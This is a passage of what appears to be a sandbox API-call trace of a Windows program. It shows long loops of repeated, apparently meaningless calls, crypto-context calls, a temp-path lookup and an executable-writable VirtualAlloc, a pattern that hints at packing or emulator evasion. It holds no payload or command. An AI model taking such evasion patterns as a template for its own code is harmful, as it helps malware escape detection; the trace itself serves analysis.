(hDriver=0x0, message=0x500a, lParam1=0x0, lParam2=0x0) returned 0x0 [0185.992] SendDriverMessage (hDriver=0x0, message=0x500a, lParam1=0x0, lParam2=0x0) returned 0x0 [0185.992] SendDriverMessage (hDriver=0x0, message=0x500a, lParam1=0x0, lParam2=0x0) returned 0x0 [0185.992] SendDriverMessage (hDriver=0x0, message=0x500a, lParam1=0x0, lParam2=0x0) returned 0x0 [0185.992] SendDriverMessage (hDriver=0x0, message=0x500a, lParam1=0x0, lParam2=0x0) returned 0x0 [0185.992] SendDriverMessage (hDriver=0x0, message=0x500a, lParam1=0x0, lParam2=0x0) returned 0x0 [0185.993] SendDriverMessage (hDriver=0x0, message=0x500a, lParam1=0x0, lParam2=0x0) returned 0x0 [0185.993] SendDriverMessage (hDriver=0x0, message=0x500a, lParam1=0x0, lParam2=0x0) returned 0x0 [0185.993] SendDriverMessage (hDriver=0x0, message=0x500a, lParam1=0x0, lParam2=0x0) returned 0x0 [0185.993] SendDriverMessage (hDriver=0x0, message=0x500a, lParam1=0x0, lParam2=0x0) returned 0x0 [0185.993] SendDriverMessage (hDriver=0x0, message=0x500a, lParam1=0x0, lParam2=0x0) returned 0x0 [0185.993] SendDriverMessage (hDriver=0x0, message=0x500a, lParam1=0x0, lParam2=0x0) returned 0x0 [0185.993] SendDriverMessage (hDriver=0x0, message=0x500a, lParam1=0x0, lParam2=0x0) returned 0x0 [0185.993] SendDriverMessage (hDriver=0x0, message=0x500a, lParam1=0x0, lParam2=0x0) returned 0x0 [0185.993] SendDriverMessage (hDriver=0x0, message=0x500a, lParam1=0x0, lParam2=0x0) returned 0x0 [0185.993] SendDriverMessage (hDriver=0x0, message=0x500a, lParam1=0x0, lParam2=0x0) returned 0x0 [0185.993] SendDriverMessage (hDriver=0x0, message=0x500a, lParam1=0x0, lParam2=0x0) returned 0x0 [0185.993] SendDriverMessage (hDriver=0x0, message=0x500a, lParam1=0x0, lParam2=0x0) returned 0x0 [0185.993] SendDriverMessage (hDriver=0x0, message=0x500a, lParam1=0x0, lParam2=0x0) returned 0x0 [0185.993] SendDriverMessage (hDriver=0x0, message=0x500a, lParam1=0x0, lParam2=0x0) returned 0x0 [0185.993] SendDriverMessage (hDriver=0x0, message=0x500a, lParam1=0x0, lParam2=0x0) returned 0x0 [0185.993] SendDriverMessage (hDriver=0x0, message=0x500a, lParam1=0x0, lParam2=0x0) returned 0x0 [0185.993] SendDriverMessage (hDriver=0x0, message=0x500a, lParam1=0x0, lParam2=0x0) returned 0x0 [0185.993] SendDriverMessage (hDriver=0x0, message=0x500a, lParam1=0x0, lParam2=0x0) returned 0x0 [0185.993] SendDriverMessage (hDriver=0x0, message=0x500a, lParam1=0x0, lParam2=0x0) returned 0x0 [0185.993] SendDriverMessage (hDriver=0x0, message=0x500a, lParam1=0x0, lParam2=0x0) returned 0x0 [0185.993] SendDriverMessage (hDriver=0x0, message=0x500a, lParam1=0x0, lParam2=0x0) returned 0x0 [0185.993] SendDriverMessage (hDriver=0x0, message=0x500a, lParam1=0x0, lParam2=0x0) returned 0x0 [0185.993] SendDriverMessage (hDriver=0x0, message=0x500a, lParam1=0x0, lParam2=0x0) returned 0x0 [0185.997] SetDlgItemTextA (hDlg=0x0, nIDDlgItem=0, lpString="Device not created. Choose settings and click 'Create Device' then type to see results") returned 0 [0185.997] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x6067a0 | out: hHeap=0x5e0000) returned 1 [0185.997] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x601778 | out: hHeap=0x5e0000) returned 1 [0185.997] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x5fbab0 | out: hHeap=0x5e0000) returned 1 [0185.997] GetTempPathW (in: nBufferLength=0x104, lpBuffer=0x19e418 | out: lpBuffer="C:\\Users\\FD1HVy\\AppData\\Local\\Temp\\") returned 0x23 [0185.997] GetTickCount () returned 0x2c1bf [0185.997] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0xc) returned 0x606848 [0185.997] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0xc) returned 0x606800 [0185.997] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0xc) returned 0x6067e8 [0185.998] CreateSolidBrush (color=0xf8) returned 0x6310052a [0185.998] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0xc) returned 0x606950 [0185.998] SendDlgItemMessageA (hDlg=0x0, nIDDlgItem=3682552, Msg=0xcf, wParam=0x1, lParam=0x0) returned 0x0 [0185.998] SendMessageA (hWnd=0x0, Msg=0x1037, wParam=0x0, lParam=0x0) returned 0x0 [0185.998] CryptAcquireContextA (in: phProv=0x19e140, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x0 | out: phProv=0x19e140*=0x5ee258) returned 1 [0187.608] SHCreateShellItem (in: pidlParent=0x0, psfParent=0x0, pidl=0x0, ppsi=0x19e13c | out: ppsi=0x19e13c*=0x0) returned 0x800401f0 [0187.672] DestroyWindow (hWnd=0x0) returned 0 [0187.672] SHCreateShellItem (in: pidlParent=0x0, psfParent=0x0, pidl=0x0, ppsi=0x19e13c | out: ppsi=0x19e13c*=0x0) returned 0x800401f0 [0187.672] DestroyWindow (hWnd=0x0) returned 0 [0187.672] SHCreateShellItem (in: pidlParent=0x0, psfParent=0x0, pidl=0x0, ppsi=0x19e13c | out: ppsi=0x19e13c*=0x0) returned 0x800401f0 [0187.672] DestroyWindow (hWnd=0x0) returned 0 [0187.672] SHCreateShellItem (in: pidlParent=0x0, psfParent=0x0, pidl=0x0, ppsi=0x19e13c | out: ppsi=0x19e13c*=0x0) returned 0x800401f0 [0187.672] DestroyWindow (hWnd=0x0) returned 0 [0187.672] SHCreateShellItem (in: pidlParent=0x0, psfParent=0x0, pidl=0x0, ppsi=0x19e13c | out: ppsi=0x19e13c*=0x0) returned 0x800401f0 [0187.673] DestroyWindow (hWnd=0x0) returned 0 [0187.673] SHCreateShellItem (in: pidlParent=0x0, psfParent=0x0, pidl=0x0, ppsi=0x19e13c | out: ppsi=0x19e13c*=0x0) returned 0x800401f0 [0187.673] DestroyWindow (hWnd=0x0) returned 0 [0187.673] SHCreateShellItem (in: pidlParent=0x0, psfParent=0x0, pidl=0x0, ppsi=0x19e13c | out: ppsi=0x19e13c*=0x0) returned 0x800401f0 [0187.673] DestroyWindow (hWnd=0x0) returned 0 [0187.673] SHCreateShellItem (in: pidlParent=0x0, psfParent=0x0, pidl=0x0, ppsi=0x19e13c | out: ppsi=0x19e13c*=0x0) returned 0x800401f0 [0187.673] DestroyWindow (hWnd=0x0) returned 0 [0187.673] SHCreateShellItem (in: pidlParent=0x0, psfParent=0x0, pidl=0x0, ppsi=0x19e13c | out: ppsi=0x19e13c*=0x0) returned 0x800401f0 [0187.673] DestroyWindow (hWnd=0x0) returned 0 [0187.673] SHCreateShellItem (in: pidlParent=0x0, psfParent=0x0, pidl=0x0, ppsi=0x19e13c | out: ppsi=0x19e13c*=0x0) returned 0x800401f0 [0187.673] DestroyWindow (hWnd=0x0) returned 0 [0187.673] SHCreateShellItem (in: pidlParent=0x0, psfParent=0x0, pidl=0x0, ppsi=0x19e13c | out: ppsi=0x19e13c*=0x0) returned 0x800401f0 [0187.673] DestroyWindow (hWnd=0x0) returned 0 [0187.673] SHCreateShellItem (in: pidlParent=0x0, psfParent=0x0, pidl=0x0, ppsi=0x19e13c | out: ppsi=0x19e13c*=0x0) returned 0x800401f0 [0187.674] DestroyWindow (hWnd=0x0) returned 0 [0187.674] SHCreateShellItem (in: pidlParent=0x0, psfParent=0x0, pidl=0x0, ppsi=0x19e13c | out: ppsi=0x19e13c*=0x0) returned 0x800401f0 [0187.674] DestroyWindow (hWnd=0x0) returned 0 [0187.674] SHCreateShellItem (in: pidlParent=0x0, psfParent=0x0, pidl=0x0, ppsi=0x19e13c | out: ppsi=0x19e13c*=0x0) returned 0x800401f0 [0187.674] DestroyWindow (hWnd=0x0) returned 0 [0187.674] SHCreateShellItem (in: pidlParent=0x0, psfParent=0x0, pidl=0x0, ppsi=0x19e13c | out: ppsi=0x19e13c*=0x0) returned 0x800401f0 [0187.674] DestroyWindow (hWnd=0x0) returned 0 [0187.674] SHCreateShellItem (in: pidlParent=0x0, psfParent=0x0, pidl=0x0, ppsi=0x19e13c | out: ppsi=0x19e13c*=0x0) returned 0x800401f0 [0187.674] DestroyWindow (hWnd=0x0) returned 0 [0187.674] SHCreateShellItem (in: pidlParent=0x0, psfParent=0x0, pidl=0x0, ppsi=0x19e13c | out: ppsi=0x19e13c*=0x0) returned 0x800401f0 [0187.674] DestroyWindow (hWnd=0x0) returned 0 [0187.674] SHCreateShellItem (in: pidlParent=0x0, psfParent=0x0, pidl=0x0, ppsi=0x19e13c | out: ppsi=0x19e13c*=0x0) returned 0x800401f0 [0187.674] DestroyWindow (hWnd=0x0) returned 0 [0187.674] SHCreateShellItem (in: pidlParent=0x0, psfParent=0x0, pidl=0x0, ppsi=0x19e13c | out: ppsi=0x19e13c*=0x0) returned 0x800401f0 [0187.675] DestroyWindow (hWnd=0x0) returned 0 [0187.675] SHCreateShellItem (in: pidlParent=0x0, psfParent=0x0, pidl=0x0, ppsi=0x19e13c | out: ppsi=0x19e13c*=0x0) returned 0x800401f0 [0187.675] DestroyWindow (hWnd=0x0) returned 0 [0187.675] SHCreateShellItem (in: pidlParent=0x0, psfParent=0x0, pidl=0x0, ppsi=0x19e13c | out: ppsi=0x19e13c*=0x0) returned 0x800401f0 [0187.675] DestroyWindow (hWnd=0x0) returned 0 [0187.675] SHCreateShellItem (in: pidlParent=0x0, psfParent=0x0, pidl=0x0, ppsi=0x19e13c | out: ppsi=0x19e13c*=0x0) returned 0x800401f0 [0187.675] DestroyWindow (hWnd=0x0) returned 0 [0187.675] SHCreateShellItem (in: pidlParent=0x0, psfParent=0x0, pidl=0x0, ppsi=0x19e13c | out: ppsi=0x19e13c*=0x0) returned 0x800401f0 [0187.675] DestroyWindow (hWnd=0x0) returned 0 [0187.675] SHCreateShellItem (in: pidlParent=0x0, psfParent=0x0, pidl=0x0, ppsi=0x19e13c | out: ppsi=0x19e13c*=0x0) returned 0x800401f0 [0187.675] DestroyWindow (hWnd=0x0) returned 0 [0187.675] SHCreateShellItem (in: pidlParent=0x0, psfParent=0x0, pidl=0x0, ppsi=0x19e13c | out: ppsi=0x19e13c*=0x0) returned 0x800401f0 [0187.675] DestroyWindow (hWnd=0x0) returned 0 [0187.675] SHCreateShellItem (in: pidlParent=0x0, psfParent=0x0, pidl=0x0, ppsi=0x19e13c | out: ppsi=0x19e13c*=0x0) returned 0x800401f0 [0187.676] DestroyWindow (hWnd=0x0) returned 0 [0187.676] SHCreateShellItem (in: pidlParent=0x0, psfParent=0x0, pidl=0x0, ppsi=0x19e13c | out: ppsi=0x19e13c*=0x0) returned 0x800401f0 [0187.676] DestroyWindow (hWnd=0x0) returned 0 [0187.676] SHCreateShellItem (in: pidlParent=0x0, psfParent=0x0, pidl=0x0, ppsi=0x19e13c | out: ppsi=0x19e13c*=0x0) returned 0x800401f0 [0187.676] DestroyWindow (hWnd=0x0) returned 0 [0187.676] SHCreateShellItem (in: pidlParent=0x0, psfParent=0x0, pidl=0x0, ppsi=0x19e13c | out: ppsi=0x19e13c*=0x0) returned 0x800401f0 [0187.676] DestroyWindow (hWnd=0x0) returned 0 [0187.676] SHCreateShellItem (in: pidlParent=0x0, psfParent=0x0, pidl=0x0, ppsi=0x19e13c | out: ppsi=0x19e13c*=0x0) returned 0x800401f0 [0187.676] DestroyWindow (hWnd=0x0) returned 0 [0187.676] SHCreateShellItem (in: pidlParent=0x0, psfParent=0x0, pidl=0x0, ppsi=0x19e13c | out: ppsi=0x19e13c*=0x0) returned 0x800401f0 [0187.676] DestroyWindow (hWnd=0x0) returned 0 [0187.676] SHCreateShellItem (in: pidlParent=0x0, psfParent=0x0, pidl=0x0, ppsi=0x19e13c | out: ppsi=0x19e13c*=0x0) returned 0x800401f0 [0187.676] DestroyWindow (hWnd=0x0) returned 0 [0187.676] SHCreateShellItem (in: pidlParent=0x0, psfParent=0x0, pidl=0x0, ppsi=0x19e13c | out: ppsi=0x19e13c*=0x0) returned 0x800401f0 [0187.677] DestroyWindow (hWnd=0x0) returned 0 [0187.677] SHCreateShellItem (in: pidlParent=0x0, psfParent=0x0, pidl=0x0, ppsi=0x19e13c | out: ppsi=0x19e13c*=0x0) returned 0x800401f0 [0187.677] DestroyWindow (hWnd=0x0) returned 0 [0187.677] SHCreateShellItem (in: pidlParent=0x0, psfParent=0x0, pidl=0x0, ppsi=0x19e13c | out: ppsi=0x19e13c*=0x0) returned 0x800401f0 [0187.677] DestroyWindow (hWnd=0x0) returned 0 [0187.677] SHCreateShellItem (in: pidlParent=0x0, psfParent=0x0, pidl=0x0, ppsi=0x19e13c | out: ppsi=0x19e13c*=0x0) returned 0x800401f0 [0187.677] DestroyWindow (hWnd=0x0) returned 0 [0187.677] SHCreateShellItem (in: pidlParent=0x0, psfParent=0x0, pidl=0x0, ppsi=0x19e13c | out: ppsi=0x19e13c*=0x0) returned 0x800401f0 [0187.677] DestroyWindow (hWnd=0x0) returned 0 [0187.677] SHCreateShellItem (in: pidlParent=0x0, psfParent=0x0, pidl=0x0, ppsi=0x19e13c | out: ppsi=0x19e13c*=0x0) returned 0x800401f0 [0187.677] DestroyWindow (hWnd=0x0) returned 0 [0187.677] SHCreateShellItem (in: pidlParent=0x0, psfParent=0x0, pidl=0x0, ppsi=0x19e13c | out: ppsi=0x19e13c*=0x0) returned 0x800401f0 [0187.677] DestroyWindow (hWnd=0x0) returned 0 [0187.678] SHCreateShellItem (in: pidlParent=0x0, psfParent=0x0, pidl=0x0, ppsi=0x19e13c | out: ppsi=0x19e13c*=0x0) returned 0x800401f0 [0187.678] DestroyWindow (hWnd=0x0) returned 0 [0187.678] SHCreateShellItem (in: pidlParent=0x0, psfParent=0x0, pidl=0x0, ppsi=0x19e13c | out: ppsi=0x19e13c*=0x0) returned 0x800401f0 [0187.678] DestroyWindow (hWnd=0x0) returned 0 [0187.678] SHCreateShellItem (in: pidlParent=0x0, psfParent=0x0, pidl=0x0, ppsi=0x19e13c | out: ppsi=0x19e13c*=0x0) returned 0x800401f0 [0187.678] DestroyWindow (hWnd=0x0) returned 0 [0187.678] SHCreateShellItem (in: pidlParent=0x0, psfParent=0x0, pidl=0x0, ppsi=0x19e13c | out: ppsi=0x19e13c*=0x0) returned 0x800401f0 [0187.678] DestroyWindow (hWnd=0x0) returned 0 [0187.678] SHCreateShellItem (in: pidlParent=0x0, psfParent=0x0, pidl=0x0, ppsi=0x19e13c | out: ppsi=0x19e13c*=0x0) returned 0x800401f0 [0187.678] DestroyWindow (hWnd=0x0) returned 0 [0187.678] SHCreateShellItem (in: pidlParent=0x0, psfParent=0x0, pidl=0x0, ppsi=0x19e13c | out: ppsi=0x19e13c*=0x0) returned 0x800401f0 [0187.678] DestroyWindow (hWnd=0x0) returned 0 [0187.678] SHCreateShellItem (in: pidlParent=0x0, psfParent=0x0, pidl=0x0, ppsi=0x19e13c | out: ppsi=0x19e13c*=0x0) returned 0x800401f0 [0187.678] DestroyWindow (hWnd=0x0) returned 0 [0187.679] SHCreateShellItem (in: pidlParent=0x0, psfParent=0x0, pidl=0x0, ppsi=0x19e13c | out: ppsi=0x19e13c*=0x0) returned 0x800401f0 [0187.679] DestroyWindow (hWnd=0x0) returned 0 [0187.679] SHCreateShellItem (in: pidlParent=0x0, psfParent=0x0, pidl=0x0, ppsi=0x19e13c | out: ppsi=0x19e13c*=0x0) returned 0x800401f0 [0187.679] DestroyWindow (hWnd=0x0) returned 0 [0187.679] SHCreateShellItem (in: pidlParent=0x0, psfParent=0x0, pidl=0x0, ppsi=0x19e13c | out: ppsi=0x19e13c*=0x0) returned 0x800401f0 [0187.679] DestroyWindow (hWnd=0x0) returned 0 [0187.679] SHCreateShellItem (in: pidlParent=0x0, psfParent=0x0, pidl=0x0, ppsi=0x19e13c | out: ppsi=0x19e13c*=0x0) returned 0x800401f0 [0187.679] DestroyWindow (hWnd=0x0) returned 0 [0187.679] SHCreateShellItem (in: pidlParent=0x0, psfParent=0x0, pidl=0x0, ppsi=0x19e13c | out: ppsi=0x19e13c*=0x0) returned 0x800401f0 [0187.679] DestroyWindow (hWnd=0x0) returned 0 [0187.680] SHCreateShellItem (in: pidlParent=0x0, psfParent=0x0, pidl=0x0, ppsi=0x19e13c | out: ppsi=0x19e13c*=0x0) returned 0x800401f0 [0187.680] DestroyWindow (hWnd=0x0) returned 0 [0187.680] SHCreateShellItem (in: pidlParent=0x0, psfParent=0x0, pidl=0x0, ppsi=0x19e13c | out: ppsi=0x19e13c*=0x0) returned 0x800401f0 [0187.680] DestroyWindow (hWnd=0x0) returned 0 [0187.680] SHCreateShellItem (in: pidlParent=0x0, psfParent=0x0, pidl=0x0, ppsi=0x19e13c | out: ppsi=0x19e13c*=0x0) returned 0x800401f0 [0187.680] DestroyWindow (hWnd=0x0) returned 0 [0187.680] SHCreateShellItem (in: pidlParent=0x0, psfParent=0x0, pidl=0x0, ppsi=0x19e13c | out: ppsi=0x19e13c*=0x0) returned 0x800401f0 [0187.680] DestroyWindow (hWnd=0x0) returned 0 [0187.680] SHCreateShellItem (in: pidlParent=0x0, psfParent=0x0, pidl=0x0, ppsi=0x19e13c | out: ppsi=0x19e13c*=0x0) returned 0x800401f0 [0187.680] DestroyWindow (hWnd=0x0) returned 0 [0187.680] SHCreateShellItem (in: pidlParent=0x0, psfParent=0x0, pidl=0x0, ppsi=0x19e13c | out: ppsi=0x19e13c*=0x0) returned 0x800401f0 [0187.680] DestroyWindow (hWnd=0x0) returned 0 [0187.680] SHCreateShellItem (in: pidlParent=0x0, psfParent=0x0, pidl=0x0, ppsi=0x19e13c | out: ppsi=0x19e13c*=0x0) returned 0x800401f0 [0187.680] DestroyWindow (hWnd=0x0) returned 0 [0187.681] SHCreateShellItem (in: pidlParent=0x0, psfParent=0x0, pidl=0x0, ppsi=0x19e13c | out: ppsi=0x19e13c*=0x0) returned 0x800401f0 [0187.681] DestroyWindow (hWnd=0x0) returned 0 [0187.681] SHCreateShellItem (in: pidlParent=0x0, psfParent=0x0, pidl=0x0, ppsi=0x19e13c | out: ppsi=0x19e13c*=0x0) returned 0x800401f0 [0187.681] DestroyWindow (hWnd=0x0) returned 0 [0187.681] SHCreateShellItem (in: pidlParent=0x0, psfParent=0x0, pidl=0x0, ppsi=0x19e13c | out: ppsi=0x19e13c*=0x0) returned 0x800401f0 [0187.681] DestroyWindow (hWnd=0x0) returned 0 [0187.681] SHCreateShellItem (in: pidlParent=0x0, psfParent=0x0, pidl=0x0, ppsi=0x19e13c | out: ppsi=0x19e13c*=0x0) returned 0x800401f0 [0187.681] DestroyWindow (hWnd=0x0) returned 0 [0187.681] SHCreateShellItem (in: pidlParent=0x0, psfParent=0x0, pidl=0x0, ppsi=0x19e13c | out: ppsi=0x19e13c*=0x0) returned 0x800401f0 [0187.681] DestroyWindow (hWnd=0x0) returned 0 [0187.681] SHCreateShellItem (in: pidlParent=0x0, psfParent=0x0, pidl=0x0, ppsi=0x19e13c | out: ppsi=0x19e13c*=0x0) returned 0x800401f0 [0187.681] DestroyWindow (hWnd=0x0) returned 0 [0187.681] BeginPaint (in: hWnd=0x0, lpPaint=0x19e2f8 | out: lpPaint=0x19e2f8) returned 0x0 [0187.682] VirtualAlloc (lpAddress=0x0, dwSize=0x9fff, flAllocationType=0x3000, flProtect=0x40) returned 0x1e0000 [0187.682] GetWindowLongA (hWnd=0x0, nIndex=-21) returned 0 [0187.682] CryptReleaseContext (hProv=0x5ee258, dwFlags=0x0) returned 1 [0187.682] CombineRgn (hrgnDst=0x0, hrgnSrc1=0x3830f8, hrgnSrc2=0x0, iMode=1) returned 0 [0187.682] EndPaint (hWnd=0x0, lpPaint=0x19e2f8) returned 0 [0187.682] GetWindowLongA (hWnd=0x0, nIndex=-21) returned 0 [0187.682] CryptReleaseContext (hProv=0x5ee258, dwFlags=0x0) returned 0 [0187.682] CombineRgn (hrgnDst=0x0, hrgnSrc1=0x0, hrgnSrc2=0x0, iMode=1) returned 0 [0187.682] EndPaint (hWnd=0x0, lpPaint=0x19e2f8) returned 0 [0187.682] GetWindowLongA (hWnd=0x0, nIndex=-21) returned 0 [0187.683] CryptReleaseContext (hProv=0x5ee258, dwFlags=0x0) returned 0 [0187.683] CombineRgn (hrgnDst=0x0, hrgnSrc1=0x0, hrgnSrc2=0x0, iMode=1) returned 0 [0187.683] EndPaint (hWnd=0x0, lpPaint=0x19e2f8) returned 0 [0187.683] GetWindowLongA (hWnd=0x0, nIndex=-21) returned 0 [0187.683] CryptReleaseContext (hProv=0x5ee258, dwFlags=0x0) returned 0 [0187.683] CombineRgn (hrgnDst=0x0, hrgnSrc1=0x0, hrgnSrc2=0x0, iMode=1) returned 0 [0187.683] EndPaint (hWnd=0x0, lpPaint=0x19e2f8) returned 0 [0187.683] GetWindowLongA (hWnd=0x0, nIndex=-21) returned 0 [0187.683] CryptReleaseContext (hProv=0x5ee258, dwFlags=0x0) returned 0 [0187.683] CombineRgn (hrgnDst=0x0, hrgnSrc1=0x0, hrgnSrc2=0x0, iMode=1) returned 0 [0187.683] EndPaint (hWnd=0x0, lpPaint=0x19e2f8) returned 0 [0187.683] GetWindowLongA (hWnd=0x0, nIndex=-21) returned 0 [0187.683] CryptReleaseContext (hProv=0x5ee258, dwFlags=0x0) returned 0 [0187.683] CombineRgn (hrgnDst=0x0, hrgnSrc1=0x0, hrgnSrc2=0x0, iMode=1) returned 0 [0187.683] EndPaint (hWnd=0x0, lpPaint=0x19e2f8) returned 0 [0187.683] GetWindowLongA (hWnd=0x0, nIndex=-21) returned 0 [0187.683] CryptReleaseContext (hProv=0x5ee258, dwFlags=0x0) returned 0 [0187.684] CombineRgn (hrgnDst=0x0, hrgnSrc1=0x0, hrgnSrc2=0x0, iMode=1) returned 0 [0187.684] EndPaint (hWnd=0x0, lpPaint=0x19e2f8) returned 0 [0187.684] GetWindowLongA (hWnd=0x0, nIndex=-21) returned 0 [0187.684] CryptReleaseContext (hProv=0x5ee258, dwFlags=0x0) returned 0 [0187.684] CombineRgn (hrgnDst=0x0, hrgnSrc1=0x0, hrgnSrc2=0x0, iMode=1) returned 0 [0187.684] EndPaint (hWnd=0x0, lpPaint=0x19e2f8) returned 0 [0187.684] GetWindowLongA (hWnd=0x0, nIndex=-21) returned 0 [0187.684] CryptReleaseContext (hProv=0x5ee258, dwFlags=0x0) returned 0 [0187.684] CombineRgn (hrgnDst=0x0, hrgnSrc1=0x0, hrgnSrc2=0x0, iMode=1) returned 0 [0187.684] EndPaint (hWnd=0x0, lpPaint=0x19e2f8) returned 0 [0187.684] GetWindowLongA (hWnd=0x0, nIndex=-21) returned 0 [0187.684] CryptReleaseContext (hProv=0x5ee258, dwFlags=0x0) returned 0 [0187.684] CombineRgn (hrgnDst=0x0, hrgnSrc1=0x0, hrgnSrc2=0x0, iMode=1) returned 0 [0187.684] EndPaint (hWnd=0x0, lpPaint=0x19e2f8) returned 0 [0187.684] GetWindowLongA (hWnd=0x0, nIndex=-21) returned 0 [0187.684] CryptReleaseContext (hProv=0x5ee258, dwFlags=0x0) returned 0 [0187.685] CombineRgn (hrgnDst=0x0, hrgnSrc1=0x0, hrgnSrc2=0x0, iMode=1) returned 0 [0187.685] EndPaint (hWnd=0x0, lpPaint=0x19e2f8) returned 0 [0187.685] GetWindowLongA (hWnd=0x0, nIndex=-21) returned 0 [0187.685] CryptReleaseContext (hProv=0x5ee258, dwFlags=0x0) returned 0 [0187.685] CombineRgn (hrgnDst=0x0, hrgnSrc1=0x0, hrgnSrc2=0x0, iMode=1) returned 0 [0187.685] EndPaint (hWnd=0x0, lpPaint=0x19e2f8) returned 0 [0187.685] GetWindowLongA (hWnd=0x0, nIndex=-21) returned 0 [0187.685] CryptReleaseContext (hProv=0x5ee258, dwFlags=0x0) returned 0 [0187.685] CombineRgn (hrgnDst=0x0, hrgnSrc1=0x0, hrgnSrc2=0x0, iMode=1) returned 0 [0187.685] EndPaint (hWnd=0x0, lpPaint=0x19e2f8) returned 0 [0187.685] GetWindowLongA (hWnd=0x0, nIndex=-21) returned 0 [0187.685] CryptReleaseContext (hProv=0x5ee258, dwFlags=0x0) returned 0 [0187.685] CombineRgn (hrgnDst=0x0, hrgnSrc1=0x0, hrgnSrc2=0x0, iMode=1) returned 0 [0187.685] EndPaint (hWnd=0x0, lpPaint=0x19e2f8) returned 0 [0187.685] GetWindowLongA (hWnd=0x0, nIndex=-21) returned 0 [0187.685] CryptReleaseContext (hProv=0x5ee258, dwFlags=0x0) returned 0 [0187.686] CombineRgn (hrgnDst=0x0, hrgnSrc1=0x0, hrgnSrc2=0x0, iMode=1) returned 0 [0187.686] EndPaint (hWnd=0x0, lpPaint=0x19e2f8) returned 0 [0187.686] GetWindowLongA (hWnd=0x0, nIndex=-21) returned 0 [0187.686] CryptReleaseContext (hProv=0x5ee258, dwFlags=0x0) returned 0 [0187.686] CombineRgn (hrgnDst=0x0, hrgnSrc1=0x0, hrgnSrc2=0x0, iMode=1) returned 0 [0187.686] EndPaint (hWnd=0x0, lpPaint=0x19e2f8) returned 0 [0187.686] GetWindowLongA (hWnd=0x0, nIndex=-21) returned 0 [0187.686] CryptReleaseContext (hProv=0x5ee258, dwFlags=0x0) returned 0 [0187.686] CombineRgn (hrgnDst=0x0, hrgnSrc1=0x0, hrgnSrc2=0x0, iMode=1) returned 0 [0187.686] EndPaint (hWnd=0x0, lpPaint=0x19e2f8) returned 0 [0187.686] GetWindowLongA (hWnd=0x0, nIndex=-21) returned 0 [0187.686] CryptReleaseContext (hProv=0x5ee258, dwFlags=0x0) returned 0 [0187.686] CombineRgn (hrgnDst=0x0, hrgnSrc1=0x0, hrgnSrc2=0x0, iMode=1) returned 0 [0187.686] EndPaint (hWnd=0x0, lpPaint=0x19e2f8) returned 0 [0187.686] GetWindowLongA (hWnd=0x0, nIndex=-21) returned 0 [0187.686] CryptReleaseContext (hProv=0x5ee258, dwFlags=0x0) returned 0 [0187.686] CombineRgn (hrgnDst=0x0, hrgnSrc1=0x0, hrgnSrc2=0x0, iMode=1) returned 0 [0187.687] EndPaint (hWnd=0x0, lpPaint=0x19e2f8) returned 0 [0187.687] GetWindowLongA (hWnd=0x0, nIndex=-21) returned 0 [0187.687] CryptReleaseContext (hProv=0x5ee258, dwFlags=0x0) returned 0 [0187.687] CombineRgn (hrgnDst=0x0, hrgnSrc1=0x0, hrgnSrc2=0x0, iMode=1) returned 0 [0187.687] EndPaint (hWnd=0x0, lpPaint=0x19e2f8) returned 0 [0187.687] GetWindowLongA (hWnd=0x0, nIndex=-21) returned 0 [0187.687] CryptReleaseContext (hProv=0x5ee258, dwFlags=0x0) returned 0 [0187.687] CombineRgn (hrgnDst=0x0, hrgnSrc1=0x0, hrgnSrc2=0x0, iMode=1) returned 0 [0187.687] EndPaint (hWnd=0x0, lpPaint=0x19e2f8) returned 0 [0187.687] GetWindowLongA (hWnd=0x0, nIndex=-21) returned 0 [0187.687] CryptReleaseContext (hProv=0x5ee258, dwFlags=0x0) returned 0 [0187.687] CombineRgn (hrgnDst=0x0, hrgnSrc1=0x0, hrgnSrc2=0x0, iMode=1) returned 0 [0187.687] EndPaint (hWnd=0x0, lpPaint=0x19e2f8) returned 0 [0187.687] GetWindowLongA (hWnd=0x0, nIndex=-21) returned 0 [0187.687] CryptReleaseContext (hProv=0x5ee258, dwFlags=0x0) returned 0 [0187.687] CombineRgn (hrgnDst=0x0, hrgnSrc1=0x0, hrgnSrc2=0x0, iMode=1) returned 0 [0187.688] EndPaint (hWnd=0x0, lpPaint=0x19e2f8) returned 0 [0187.688] GetWindowLongA (hWnd=0x0, nIndex=-21) returned 0 [0187.688] CryptReleaseContext (hProv=0x5ee258, dwFlags=0x0) returned 0 [0187.688] CombineRgn (hrgnDst=0x0, hrgnSrc1=0x0, hrgnSrc2=0x0, iMode=1) returned 0 [0187.688] EndPaint (hWnd=0x0, lpPaint=0x19e2f8) returned 0 [0187.688] GetWindowLongA (hWnd=0x0, nIndex=-21) returned 0 [0187.688] CryptReleaseContext (hProv=0x5ee258, dwFlags=0x0) returned 0 [0187.688] CombineRgn (hrgnDst=0x0, hrgnSrc1=0x0, hrgnSrc2=0x0, iMode=1) returned 0 [0187.688] EndPaint (hWnd=0x0, lpPaint=0x19e2f8) returned 0 [0187.688] GetWindowLongA (hWnd=0x0, nIndex=-21) returned 0 [0187.688] CryptReleaseContext (hProv=0x5ee258, dwFlags=0x0) returned 0 [0187.688] CombineRgn (hrgnDst=0x0, hrgnSrc1=0x0, hrgnSrc2=0x0, iMode=1) returned 0 [0187.688] EndPaint (hWnd=0x0, lpPaint=0x19e2f8) returned 0 [0187.688] GetWindowLongA (hWnd=0x0, nIndex=-21) returned 0 [0187.688] CryptReleaseContext (hProv=0x5ee258, dwFlags=0x0) returned 0 [0187.688] CombineRgn (hrgnDst=0x0, hrgnSrc1=0x0, hrgnSrc2=0x0, iMode=1) returned 0 [0187.688] EndPaint (hWnd=0x0, lpPaint=0x19e2f8) returned 0 [0187.688] GetWindowLongA (hWnd=0x0, nIndex=-21) returned 0 [0187.688] CryptReleaseContext (hProv=0x5ee258, dwFlags=0x0) returned 0 [0187.688] CombineRgn (hrgnDst=0x0, hrgnSrc1=0x0, hrgnSrc2=0x0, iMode=1) returned 0 [0187.689] EndPaint (hWnd=0x0, lpPaint=0x19e2f8) returned 0 [0187.689] GetWindowLongA (hWnd=0x0, nIndex=-21) returned 0 [0187.689] CryptReleaseContext (hProv=0x5ee258, 